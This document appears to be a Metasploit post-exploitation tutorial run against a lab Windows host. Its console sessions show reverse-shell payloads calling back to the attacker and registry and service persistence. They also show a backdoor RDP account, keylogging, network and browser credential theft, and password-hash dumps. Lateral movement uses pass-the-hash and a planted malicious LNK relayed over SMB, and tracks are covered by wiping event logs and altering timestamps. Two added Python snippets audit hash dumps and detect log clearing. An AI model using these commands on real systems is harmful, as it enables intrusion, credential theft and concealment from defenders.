Post-exploitation
Basic usage
Ordinary session
At this point session 1 has already been obtained. Using the enum_drives post module as an example:
msf6 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives
msf6 post(windows/gather/forensics/enum_drives) > set session 1
session => 1
msf6 post(windows/gather/forensics/enum_drives) > run
# Lists the disk partitions on the target
meterpreter
Check whether the target is a virtual machine:
msf6 post(windows/gather/forensics/enum_drives) > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > run
meterpreter > run post/windows/gather/checkvm
[*] Checking if ROOKIE8J-A4C239 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
Post-exploitation modules
persistence
Writes to the registry, starts at boot, and reconnects at a fixed interval:
meterpreter > run persistence -X -i 5 -p 443 -r 192.168.172.136
# -X start at boot, -i reconnect interval in seconds, -p port on the local host to connect back to, -r callback address
Set up the handler:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.172.136
lhost => 192.168.172.136
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > run
The meterpreter shell calls back again after the target reboots.
metsvc
Installs meterpreter on the target host as a system service:
meterpreter > run metsvc
This opens a listening port on the target and waits for connections.
getgui
meterpreter > run getgui -u metasploit -p meterpreter
# Adds a user named metasploit with password meterpreter on the target and enables RDP (port 3389)
# If the target is on an internal network, use portfwd to forward the port
Privilege escalation
getsystem command
meterpreter's privilege escalation command, which integrates four techniques:
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)
2 : Named Pipe Impersonation (Dropper/Admin)
3 : Token Duplication (In Memory/Admin)
4 : Named Pipe Impersonation (RPCSS variant)
Techniques 1 and 4 exploit the vulnerabilities in MS09-012 and MS10-015 respectively; the parentheses give (environment/required privilege).
Information theft
dumplinks module
Lists recently used files:
meterpreter > run post/windows/gather/dumplinks
It runs slowly because, for every LNK file, Metasploit writes a record file under /root/.msf4/loot containing the original file location, creation and modification times and other details taken from that LNK file.
enum_applications module
Lists the software, security updates and patches installed on the target host:
meterpreter > run post/windows/gather/enum_applications
keyscan commands
Records keystrokes:
meterpreter > keyscan_start
# start recording
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
# dump what has been recorded
Dumping captured keystrokes...
<LAlt><Delete><Left Windows>cmd<CR>
<CR>
<Shift>ipconfig<CR>
meterpreter > keyscan_stop
# stop recording
Stopping the keystroke sniffer...
Password theft
meterpreter > use sniffer
# load the sniffer extension
Loading extension sniffer...Success.
meterpreter > help
# show sniffer help
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_release Free captured packets on a specific interface instead of downloading them
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
Network sniffing
meterpreter > sniffer_interfaces
# list the sniffable interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
# select the interface to sniff
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /root/Desktop/interface1_sniffer.cap
# export the captured packets
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 290 packets (29979 bytes)
[*] Downloaded 100% (29979/29979)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/Desktop/interface1_sniffer.cap
meterpreter > sniffer_stop 1
# stop sniffing
[*] Capture stopped on interface 1
[*] There are 63 packets (5506 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
The exported file can be opened directly in Wireshark or similar tools.
Browser sniffing
- enum_ie module
Reads the IE browser history, cookies and cached passwords and saves them locally.
meterpreter > run post/windows/gather/enum_ie
[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
File: C:\Documents and Settings\rookie8j\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
File: C:\Documents and Settings\rookie8j\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
[*] Writing history to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.history_602395.txt
[*] Writing cookies to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.cookies_503272.txt
System password theft
hashdump
meterpreter has hashdump built in:
meterpreter > hashdump
Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d:::
rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781:::
Drawbacks: fails without SYSTEM privileges, and on Win7/Vista and Win2008 the process migration it relies on may not succeed.
smart_hashdump module
Addresses hashdump's drawbacks.
meterpreter > run windows/gather/smart_hashdump
[*] Running module against ROOKIE8J-A4C239
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20201212030506_default_192.168.172.130_windows.hashes_202408.txt
[*] Dumping password hashes...
[+] Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d
[+] rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781
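The hashdump and smart_hashdump output above is in pwdump format (user:RID:LM hash:NT hash). As an added example (not from the original notes or from Metasploit), the following parser audits such a dump the way an analyst would after a test: it flags accounts that still store an LM hash, accounts with an empty password, and accounts that share the same NT hash (the Administrator and rookie8j entries above share one). The sample input reuses the page's own output lines.

```python
"""Audit a pwdump-format hash dump (the format hashdump and smart_hashdump print)."""
from collections import defaultdict

# Well-known constants: LM hash stored when LM storage is disabled/empty, and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input taken from the output above; smart_hashdump lines carry a "[+] " prefix.
SAMPLE_DUMP = """\
Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d:::
[+] rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lm_hash, nt_hash) tuples; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[+]"):  # smart_hashdump prefixes every hash line
            line = line[3:].strip()
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        rows.append((user, rid, lm, nt))
    return rows


def audit(rows):
    """Flag weak hash storage and password reuse that are visible from the dump alone."""
    findings = []
    by_nt = defaultdict(list)
    for user, rid, lm, nt in rows:
        by_nt[nt].append(user)
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored (legacy LM storage enabled; weak hash)"))
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
    for nt, users in by_nt.items():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), "same NT hash: password shared across accounts"))
    return findings
```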
Internal network expansion
Internal network forwarding
meterpreter > run get_local_subnets
# get the local subnet
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.172.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > route add 192.168.172.0 255.255.255.0 4
# Route all traffic for the target subnet through the target session (session 4)
[*] Route added
msf6 exploit(multi/handler) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.172.0 255.255.255.0 Session 4
[*] There are currently no IPv6 routes defined.
SMB pass-the-hash attack
Assume the hash from an ordinary employee's workstation on the internal network has already been obtained:
Port scan:
msf6 > db_nmap -sS -p 445 192.168.172.0/24
A server, 192.168.172.136, was found with SMB open; use the employee's hash in a pass-the-hash attack:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 192.168.172.136
# local IP
msf6 exploit(windows/smb/psexec) > set lport 443
# local listening port
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.172.131
# target server
msf6 exploit(windows/smb/psexec) > set smbpass b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
# the employee's hash
msf6 exploit(windows/smb/psexec) > run
The local host now starts listening:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.172.136
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run
Once the hash is used to authenticate to the server's SMB service, the server sends a meterpreter shell back to the local host.
MS08-068 combined with MS10-046
With a session already obtained:
msf6 post(windows/escalate/droplnk) > set lhost 192.168.172.136
# set the local IP
msf6 post(windows/escalate/droplnk) > set session 4
# set the session
msf6 post(windows/escalate/droplnk) > run
[*] Creating evil LNK
[*] Done. Writing to disk - C:\Documents and Settings\rookie8j\Words.lnk
# A Words.lnk file is generated
[*] Done. Wait for evil to happen..
[*] Post module execution completed
Set up the SMB service:
msf6 post(windows/escalate/droplnk) > use windows/smb/smb_relay
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/smb_relay) > set srvhost 192.168.172.136
# set the local IP
msf6 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
# set the meterpreter payload
msf6 exploit(windows/smb/smb_relay) > set lhost 192.168.172.136
# set the local IP
msf6 exploit(windows/smb/smb_relay) > run
# start the SMB service
Copy the Words.lnk file into a company shared folder and wait for other users to open it; their machines connect to the local SMB service and a meterpreter shell is obtained.
Covering tracks
clearev command
Clear the event logs:
meterpreter > clearev
[*] Wiping 535 records from Application...
[*] Wiping 65 records from System...
[*] Wiping 1 records from Security...
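clearev wipes the Application, System and Security logs, but the Event Log service records the clearing itself (Security 1102 and System 104 on Vista and later, Security 517 on XP/2003), so the wipe is detectable. As an added example (not part of the original notes), the detection below runs over constructed event records whose field names mimic a wevtutil/evtx export; they are sample data, not output from the page.

```python
"""Detect event-log clearing (the effect of clearev) in exported Windows event records."""
from datetime import datetime

# Events written by the Event Log service itself when a log is cleared:
#   Vista+ : 1102 in Security ("The audit log was cleared"), 104 in System
#            ("The <name> log file was cleared") for Application/System/other logs
#   XP/2003: 517 in Security
# They are written as part of the clear, so the cleared log's first entry is the clear itself.
CLEAR_SIGNATURES = {("Security", 1102), ("System", 104), ("Security", 517)}

# Constructed sample records (not from the page); field names mimic a wevtutil/evtx export.
SAMPLE_EVENTS = [
    {"time": "2020-12-12T03:10:01", "channel": "Security", "event_id": 4624, "user": "rookie8j"},
    {"time": "2020-12-12T03:12:40", "channel": "System", "event_id": 104, "user": "SYSTEM",
     "cleared_log": "Application"},
    {"time": "2020-12-12T03:12:40", "channel": "System", "event_id": 104, "user": "SYSTEM",
     "cleared_log": "System"},
    {"time": "2020-12-12T03:12:41", "channel": "Security", "event_id": 1102, "user": "SYSTEM"},
    {"time": "2020-12-12T03:15:00", "channel": "Application", "event_id": 1000, "user": "rookie8j"},
]


def find_log_clears(events):
    """Return one finding per clear event as (time, log that was cleared, account)."""
    hits = []
    for e in events:
        if (e.get("channel"), e.get("event_id")) not in CLEAR_SIGNATURES:
            continue
        cleared = e.get("cleared_log", "Security")  # 1102/517 always refer to the Security log
        hits.append((e["time"], cleared, e.get("user", "?")))
    return hits


def looks_like_clearev(hits, window_seconds=60):
    """clearev clears Application, System and Security in one pass, so all three
    cleared with the earliest and latest clear inside a short window is a strong indicator."""
    if not hits:
        return False
    logs = {log for _, log, _ in hits}
    if not {"Application", "System", "Security"} <= logs:
        return False
    times = sorted(datetime.fromisoformat(t) for t, _, _ in hits)
    return (times[-1] - times[0]).total_seconds() <= window_seconds
```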
timestomp command
Modify file timestamps.
meterpreter > timestomp 1.txt -f 2.txt
# Set the first file's timestamps to match the second file's